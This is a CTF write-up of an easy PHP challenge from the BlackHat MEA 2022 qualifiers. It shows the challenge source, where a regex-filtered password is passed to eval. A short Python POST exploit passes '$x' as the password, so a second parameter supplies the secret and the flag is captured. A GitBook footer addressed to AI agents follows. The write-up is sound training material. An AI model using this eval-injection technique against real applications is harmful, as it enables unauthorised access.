> For the complete documentation index, see [llms.txt](https://blog.diefunction.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.diefunction.io/ctf/blackhatmea-quals-2022/peehpee.md).

# PeehPee

## Difficulty

Easy

## Points

150

## Description

Are you able to access the secret area of Naruto ? I guess it's not that hard for you!

## Quick Analysis

View the application source code via `/?source` endpoint

```python
from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
```

```php
<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="admin@naruto.com"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }

        }
    }
}
?>
```

From the source code to obtain the flag:

* The request method should be `POST` request.
* The email parameter value must be `admin@naruto.com`.
* The regex match a single character not present in `a-z` or `A-Z` or `0-9` or `$` for the pass parameter.
* The pass parameter value shouldn't equal `SuperSecRetPassw0rd`.
* The eval function evaluates the pass parameter value.
* The test parameter value is stored in the `$x` variable.

Since the pass parameter value is evaluated, the password `SuperSecRetPassw0rd` can be returned after evaluation via the test parameter `$x` variable.

## Exploitation

```python
data = { 'email': 'admin@naruto.com', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)
```

### The Flag

```python
import re
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
```

```
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://blog.diefunction.io/ctf/blackhatmea-quals-2022/peehpee.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.